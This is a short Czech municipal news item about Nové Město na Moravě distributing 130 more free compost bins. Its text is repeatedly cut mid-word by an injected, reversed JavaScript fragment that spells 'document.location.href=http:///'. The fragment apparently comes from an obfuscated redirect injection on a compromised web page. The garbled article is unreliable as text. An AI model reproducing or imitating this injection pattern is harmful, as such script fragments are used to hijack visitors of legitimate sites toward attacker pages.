Rainbow page separator

Ve Městě a okolí rozdají další kompostéry, už jich bude 870

Pondělí, 19. dubna 2021

Domácí kompostér

Nové Měs[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to na Moravě / Dalších 130 kusů kompostérů hodlá v průběhu le[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tošního roku ve městě a v jeho místních částech rozmístit novoměstská radnice ve spolupráci s Mikroregionem Novoměstsko. Na tu[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to akci se jim podařilo získat příslib dotace. Nádoby jsou již zamluvené a zájemce o ně budou s termínem jejich přesného převzetí úředníci městského úřadu předem kontak[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tovat. V případě, že se najdou ještě další obyvatelé Nového Města a jeho osad, kteří projeví o bezplatnou výpůčku kompostéru zájem, mohou se přihlásit v odboru správy majetku města.
Od roku 2007 je zatím lidem k dispozici 740 kompostérů určených k domovnímu kompos[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tování. Měs[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to je průběžně pořizuje v souvislosti a předcházením vzniku dalších odpadů, které by společně s ostatním nevytříděným domovním odpadem musely být za stále se zvyšující úplatu uloženy na skládce.